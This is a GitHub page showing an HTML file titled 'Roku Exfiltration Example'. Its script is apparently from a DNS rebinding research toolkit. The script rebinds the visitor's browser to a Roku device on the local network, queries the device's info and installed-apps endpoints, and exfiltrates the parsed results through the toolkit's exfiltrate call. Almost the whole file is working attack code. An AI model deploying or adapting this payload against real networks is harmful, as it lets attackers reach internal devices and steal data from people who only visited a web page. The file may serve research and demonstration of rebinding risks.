-
Notifications
You must be signed in to change notification settings - Fork 80
/
Copy pathroku-info.html
67 lines (56 loc) · 1.94 KB
/
roku-info.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
<!DOCTYPE html>
<html>
<head>
<title>Roku Exfiltration Example</title>
</head>
<body>
<script type="text/javascript" src="/share/js/xmlToJSON.min.js"></script>
<script type="text/javascript" src="/share/js/DNSRebindNode.js"></script>
<script type="text/javascript">
(function() {
attack()
.then(() => {console.log('attack finished')},
err => {
console.error(err)
DNSRebindNode.emit('fatal', err.message)
}
)
.then(() => DNSRebindNode.destroy())
async function attack() {
const getOptions = DNSRebindNode.fetchOptions()
getOptions.headers['content-type'] = 'text/xml'
try {
const opts = { fetchOptions: getOptions }
await DNSRebindNode.rebind(`http://${location.host}/query/device-info`, opts)
} catch (err) {
return Promise.reject(err)
}
const exfiltrationData = {}
try {
await Promise.all([
// get basic device info
fetch(`http://${location.host}/query/device-info`, getOptions)
.then(res => res.text())
.then(text => {
const json = xmlToJSON.parseString(text)
exfiltrationData['device-info'] = json['device-info'][0]
}),
// get basic device info
fetch(`http://${location.host}/query/apps`, getOptions)
.then(res => res.text())
.then(text => {
console.log(text)
const json = xmlToJSON.parseString(text)
exfiltrationData['apps'] = json['apps'][0]['app']
})
])
} catch (err) {
return Promise.reject(err)
}
console.log(exfiltrationData)
return await DNSRebindNode.exfiltrate('roku-info', exfiltrationData)
}
})()
</script>
</body>
</html>